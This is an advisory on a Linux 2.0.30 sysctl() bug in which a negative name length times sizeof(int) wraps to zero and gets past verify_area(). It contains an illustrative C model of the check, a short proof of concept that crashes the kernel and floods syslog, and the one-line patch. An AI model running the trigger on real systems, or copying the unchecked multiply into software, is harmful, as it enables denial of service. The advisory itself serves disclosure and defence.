Linux prior to 2.0.31


    Solar Designer posted the following about the sysctl() problem. On
    its own this one only makes it possible to generate a fault in the
    kernel, which gets logged, and so allows fast syslog (and /var)
    flooding.  Not too serious.  However, it shows how an integer
    multiply overflow (here a negative name length times sizeof(int)
    wrapping to zero) can cause a security hole.
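    A user-space model of the length check and of the wrapping multiply,
    added here as an illustration; it is not code from Solar Designer's
    post or from the kernel source. It assumes CTL_MAXNAME is 10, as in
    the 2.0 kernel headers, and does the byte-count arithmetic in 32 bits
    the way an i386 kernel of that era did (sizeof(int) == 4, size_t 32
    bits wide), which is what makes 0x80000000 and 0xC0000000 wrap to 0.

```c
#include <stdint.h>
#include <stdio.h>

/* Added example: a user-space model of the nlen handling in 2.0.30's
 * kernel/sysctl.c, not the kernel's own code. CTL_MAXNAME = 10 is an
 * assumption matching the 2.0 headers. */
#define CTL_MAXNAME 10

/* Bytes that verify_area() would be asked to check for an nlen-entry
 * name vector, computed as a 32-bit i386 kernel did it: the signed int
 * nlen is widened to a 32-bit unsigned size_t and multiplied by
 * sizeof(int) == 4, so the product wraps modulo 2^32 instead of failing. */
uint32_t name_bytes_32(int32_t nlen)
{
    return (uint32_t)nlen * 4u;
}

/* The length check as in 2.0.30 (fixed == 0) and as in the one-line
 * patch (fixed != 0). Returns 1 when nlen gets past the check. */
int passes_nlen_check(int32_t nlen, int fixed)
{
    if (fixed)
        return !(nlen <= 0 || nlen >= CTL_MAXNAME);
    return !(nlen == 0 || nlen >= CTL_MAXNAME);
}

/* A length that gets past the check AND makes the byte count wrap to 0
 * means verify_area() sees a zero-length region and accepts any name
 * pointer, NULL included. That is the condition the exploit relies on. */
int bypasses_verify_area(int32_t nlen, int fixed)
{
    return passes_nlen_check(nlen, fixed) && name_bytes_32(nlen) == 0;
}

int main(void)
{
    /* Constructed inputs: the two values from the post plus neighbours.
     * -0x40000000 is 0xC0000000 and INT32_MIN is 0x80000000 as 32-bit ints. */
    const int32_t samples[] = { 1, 3, 0, CTL_MAXNAME, -1, -0x40000000, INT32_MIN };
    size_t i;

    printf("%12s %10s %8s %8s %s\n",
           "nlen", "bytes(32)", "2.0.30", "patched", "bypass");
    for (i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        int32_t n = samples[i];
        printf("%12d 0x%08x %8s %8s %s\n", (int)n, (unsigned)name_bytes_32(n),
               passes_nlen_check(n, 0) ? "passes" : "ENOTDIR",
               passes_nlen_check(n, 1) ? "passes" : "ENOTDIR",
               bypasses_verify_area(n, 0) ? "yes" : "no");
    }
    return 0;
}
```

    The table the program prints makes the bug visible at a glance: -1
    gets past the 2.0.30 check but yields a huge byte count, while the
    two multiples of 2^30 yield exactly 0; the patched check rejects every
    negative length, and the CTL_MAXNAME bound keeps positive lengths far
    below any value that could wrap.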

    #include <sys/sysctl.h>   /* declares sysctl() on a libc of that era */

    int main(void)
    {
        /* 0x80000000 can be replaced with 0xC0000000 -- both are negative, and
         * produce a zero when multiplied by sizeof(int), so the NULL name
         * pointer passes verify_area() and the kernel faults. */
        sysctl(NULL, 0x80000000, NULL, NULL, NULL, 0);
        return 0;
    }

    There would also be a similar problem in getgroups() if gid_t was
    larger than 2 bytes long; this should be fixed if gid_t is changed
    some day.


    Should get fixed in 2.0.31.  Fast fix:

    --- /extra/linux-2.0.30/kernel/sysctl.c Sat Apr 19 20:43:22 1997
    +++ linux/kernel/sysctl.c       Mon Jun  2 23:05:52 1997
    @@ -180,7 +180,7 @@
            struct ctl_table_header *tmp;
            void *context;

    -       if (nlen == 0 || nlen >= CTL_MAXNAME)
    +       if (nlen <= 0 || nlen >= CTL_MAXNAME)
                    return -ENOTDIR;

            error = verify_area(VERIFY_READ,name,nlen*sizeof(int));
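    Review bot: the new `nlen <= 0` test is only meaningful because nlen is a signed int, and nothing in the hunk says why a negative length has to be rejected; add a comment above the check noting that a negative nlen slips past `nlen >= CTL_MAXNAME` and makes `nlen*sizeof(int)` in the verify_area() call below wrap to 0 (0x80000000 and 0xC0000000 both do), so an arbitrary name pointer is accepted. It is also worth stating that the product stays unchecked and relies on the CTL_MAXNAME upper bound to keep positive lengths from overflowing.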